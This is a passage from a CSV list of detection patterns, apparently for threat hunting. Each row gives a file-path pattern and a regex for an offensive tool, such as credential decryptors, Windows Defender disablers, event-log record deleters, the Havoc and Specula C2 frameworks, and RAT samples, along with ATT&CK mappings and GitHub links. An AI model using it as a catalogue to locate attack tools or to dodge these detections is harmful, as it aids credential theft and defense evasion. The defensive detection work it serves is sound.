tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14844" "*\DecryptAutoLogon.sln*",".{0,1000}\\DecryptAutoLogon\.sln.{0,1000}","offensive_tool_keyword","DecryptAutoLogon","Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon","T1003.001 - T1555.003 - T1003.006","TA0006","N/A","N/A","Credential Access","https://github.com/securesean/DecryptAutoLogon","1","0","N/A","N/A","10","3","218","32","2020-12-05T16:14:28Z","2020-12-03T20:38:59Z","14845" "*\DecryptAutoLogon.sln*",".{0,1000}\\DecryptAutoLogon\.sln.{0,1000}","offensive_tool_keyword","DecryptAutoLogon","Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon","T1003.001 - T1555.003 - T1003.006","TA0006","N/A","N/A","Credential Access","https://github.com/securesean/DecryptAutoLogon","1","0","N/A","N/A","10","3","218","32","2020-12-05T16:14:28Z","2020-12-03T20:38:59Z","14846" "*\DecryptAutoLogon-main*",".{0,1000}\\DecryptAutoLogon\-main.{0,1000}","offensive_tool_keyword","DecryptAutoLogon","Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon","T1003.001 - T1555.003 - T1003.006","TA0006","N/A","N/A","Credential Access","https://github.com/securesean/DecryptAutoLogon","1","0","N/A","N/A","10","3","218","32","2020-12-05T16:14:28Z","2020-12-03T20:38:59Z","14847" "*\decrypted.dmp*",".{0,1000}\\decrypted\.dmp.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","14848" 
"*\DECRYPT-FILES.txt*",".{0,1000}\\DECRYPT\-FILES\.txt.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","14849" "*\DECRYPT-FILES.txt*",".{0,1000}\\DECRYPT\-FILES\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","14850" "*\Decrypt-RDCMan.ps1*",".{0,1000}\\Decrypt\-RDCMan\.ps1.{0,1000}","offensive_tool_keyword","Decrypt-RDCMan","decrypts passwords stored in Remote Desktop Connection Manager (RDCMan) using DPAPI","T1003 - T1552 - T1081 - T1027","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/vmamuaya/Powershell/blob/master/Decrypt-RDCMan.ps1","1","0","N/A","N/A","9","1","1","1","2016-12-01T14:06:24Z","2017-11-22T23:18:39Z","14851" "*\DecryptRDCManager.sln*",".{0,1000}\\DecryptRDCManager\.sln.{0,1000}","offensive_tool_keyword","DecryptRDCManager","decrypts passwords stored in Remote Desktop Connection Manager (RDCMan) using DPAPI","T1003 - T1552 - T1081 - T1027","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/mez-0/DecryptRDCManager","1","0","N/A","N/A","8","1","73","7","2020-09-29T10:12:58Z","2020-09-29T08:53:46Z","14852" "*\DecryptTeamViewer.exe*",".{0,1000}\\DecryptTeamViewer\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 
- T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14853" "*\DecryptTeamViewer.exe*",".{0,1000}\\DecryptTeamViewer\.exe.{0,1000}","offensive_tool_keyword","DecryptTeamViewer","Enumerate and decrypt TeamViewer credentials from Windows registry","T1552.001 - T1003 - T1119 - T1012","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/V1V1/DecryptTeamViewer","1","0","N/A","N/A","7","3","241","62","2021-12-05T09:19:56Z","2020-02-07T07:50:47Z","14854" "*\DecryptTeamViewer.pdb*",".{0,1000}\\DecryptTeamViewer\.pdb.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#content","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","14855" "*\DecryptTeamViewer.sln*",".{0,1000}\\DecryptTeamViewer\.sln.{0,1000}","offensive_tool_keyword","DecryptTeamViewer","Enumerate and decrypt TeamViewer credentials from Windows registry","T1552.001 - T1003 - T1119 - T1012","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/V1V1/DecryptTeamViewer","1","0","N/A","N/A","7","3","241","62","2021-12-05T09:19:56Z","2020-02-07T07:50:47Z","14856" 
"*\DecryptTeamViewer-master*",".{0,1000}\\DecryptTeamViewer\-master.{0,1000}","offensive_tool_keyword","DecryptTeamViewer","Enumerate and decrypt TeamViewer credentials from Windows registry","T1552.001 - T1003 - T1119 - T1012","TA0006 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/V1V1/DecryptTeamViewer","1","0","N/A","N/A","7","3","241","62","2021-12-05T09:19:56Z","2020-02-07T07:50:47Z","14857" "*\Defeat-Defender-V1.2.0-main*",".{0,1000}\\Defeat\-Defender\-V1\.2\.0\-main.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","N/A","10","10","1530","316","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z","14860" "*\Defender Control.zip*",".{0,1000}\\Defender\sControl\.zip.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14861" "*\defender-control.sln*",".{0,1000}\\defender\-control\.sln.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. 
Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","N/A","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","14862" "*\defendercontrol.zip*",".{0,1000}\\defendercontrol\.zip.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14863" "*\defender-control\dcontrol.cpp*",".{0,1000}\\defender\-control\\dcontrol\.cpp.{0,1000}","offensive_tool_keyword","defender-control","An open-source windows defender manager. Now you can disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://github.com/pgkt04/defender-control","1","0","N/A","N/A","10","10","1614","128","2023-09-09T14:57:56Z","2021-05-15T10:09:17Z","14864" "*\defender-exclusions.ps1*",".{0,1000}\\defender\-exclusions\.ps1.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","14865" "*\defenderOff.rar*",".{0,1000}\\defenderOff\.rar.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","14866" 
"*\DefenderRemover.exe*",".{0,1000}\\DefenderRemover\.exe.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","14867" "*\DefenderRemover-x86.exe*",".{0,1000}\\DefenderRemover\-x86\.exe.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","14868" "*\DelegationBOF.*",".{0,1000}\\DelegationBOF\..{0,1000}","offensive_tool_keyword","DelegationBOF","This tool uses LDAP to check a domain for known abusable Kerberos delegation settings. Currently. it supports RBCD. Constrained. Constrained w/Protocol Transition. 
and Unconstrained Delegation checks.","T1098 - T1214 - T1552","TA0006","N/A","N/A","Credential Access","https://github.com/IcebreakerSecurity/DelegationBOF","1","0","N/A","N/A","N/A","10","141","23","2022-05-04T14:00:36Z","2022-03-28T20:14:24Z","14869" "*\Delete System32.exe*",".{0,1000}\\Delete\sSystem32\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14870" "*\DeleteonReboot.exe*",".{0,1000}\\DeleteonReboot\.exe.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","Schedules a file to be deleted on next Windows host reboot","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","0","N/A","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","14871" "*\DeletePSscriptSignning.bat*",".{0,1000}\\DeletePSscriptSignning\.bat.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14872" 
"*\DeleteRecordbyGetHandle.cpp*",".{0,1000}\\DeleteRecordbyGetHandle\.cpp.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","14873" "*\DeleteRecordbyGetHandle.exe*",".{0,1000}\\DeleteRecordbyGetHandle\.exe.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","14874" "*\DeleteRecordbyGetHandleEx.cpp*",".{0,1000}\\DeleteRecordbyGetHandleEx\.cpp.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","14875" "*\DeleteRecordbyTerminateProcess.cpp*",".{0,1000}\\DeleteRecordbyTerminateProcess\.cpp.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","14876" "*\DeleteRecordbyTerminateProcess.exe*",".{0,1000}\\DeleteRecordbyTerminateProcess\.exe.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","14877" "*\DeleteRecordbyTerminateProcessEx.cpp*",".{0,1000}\\DeleteRecordbyTerminateProcessEx\.cpp.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 
- T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","14878" "*\DeleteRecordbyTerminateProcessEx.exe*",".{0,1000}\\DeleteRecordbyTerminateProcessEx\.exe.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","14879" "*\DeleteRecord-EvtExportLog.cpp*",".{0,1000}\\DeleteRecord\-EvtExportLog\.cpp.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","14880" "*\DeleteRecord-EvtExportLog.exe*",".{0,1000}\\DeleteRecord\-EvtExportLog\.exe.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","14881" "*\DeleteRecordofFile.exe*",".{0,1000}\\DeleteRecordofFile\.exe.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","14882" "*\DeleteRecordofFileEx.exe*",".{0,1000}\\DeleteRecordofFileEx\.exe.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","N/A","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","14883" "*\DeleteWD.dll*",".{0,1000}\\DeleteWD\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","14884" "*\delkeyhkcuregistry.py*",".{0,1000}\\delkeyhkcuregistry\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#registry","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","14885" "*\delkeyhkcuregistry.txt*",".{0,1000}\\delkeyhkcuregistry\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#registry","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","14886" "*\Delregkey_hkcu.txt*",".{0,1000}\\Delregkey_hkcu\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - 
TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#registry","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","14887" "*\Delregvalue_hkcu.txt*",".{0,1000}\\Delregvalue_hkcu\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#registry","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","14888" "*\delvaluehkcuregistry.py*",".{0,1000}\\delvaluehkcuregistry\.py.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#registry","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","14889" "*\delvaluehkcuregistry.txt*",".{0,1000}\\delvaluehkcuregistry\.txt.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#registry","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","14890" "*\dementor.py*",".{0,1000}\\dementor\.py.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - 
T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","N/A","N/A","10","9","842","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z","14891" "*\demiguise.py*",".{0,1000}\\demiguise\.py.{0,1000}","offensive_tool_keyword","demiguise","The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page. the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place. and (if you use environmental keying) to avoid it being sandboxed.","T1564 - T1071.001 - T1071.004 - T1059 - T1070","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/nccgroup/demiguise","1","0","N/A","N/A","9","10","1389","257","2022-11-09T08:12:25Z","2017-07-26T08:56:15Z","14892" "*\Demo\VulnApp.exe*",".{0,1000}\\Demo\\VulnApp\.exe.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","N/A","10","","N/A","","","","14893" "*\demon.dll*",".{0,1000}\\demon\.dll.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","14894" "*\demon.x64.bin*",".{0,1000}\\demon\.x64\.bin.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","14895" "*\demon.x64.exe*",".{0,1000}\\demon\.x64\.exe.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","14896" "*\demon1.dll*",".{0,1000}\\demon1\.dll.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","14897" "*\demosyscalls.exe*",".{0,1000}\\demosyscalls\.exe.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - 
T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","14898" "*\Dendrobate\*",".{0,1000}\\Dendrobate\\.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","14899" "*\Dendron.bin*",".{0,1000}\\Dendron\.bin.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","14900" "*\Dendron.exe*",".{0,1000}\\Dendron\.exe.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","14901" "*\Dendron.sln*",".{0,1000}\\Dendron\.sln.{0,1000}","offensive_tool_keyword","Dendrobate","Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code","T1055.012 - T1059.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation 
tool","https://github.com/FuzzySecurity/Dendrobate","1","0","N/A","N/A","10","2","131","27","2021-11-19T12:18:50Z","2021-02-15T11:15:51Z","14902" "*\DenyOutboundFirewall.ahk*",".{0,1000}\\DenyOutboundFirewall\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","14903" "*\DeployPrinterNightmare.exe*",".{0,1000}\\DeployPrinterNightmare\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","14904" "*\DeployPrinterNightmare.exe*",".{0,1000}\\DeployPrinterNightmare\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","14905" "*\Derek.Admin.STANNCENTER\Source\Repos\*",".{0,1000}\\Derek\.Admin\.STANNCENTER\\Source\\Repos\\.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","#content","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","14906" "*\DesckVB Rat.exe*",".{0,1000}\\DesckVB\sRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 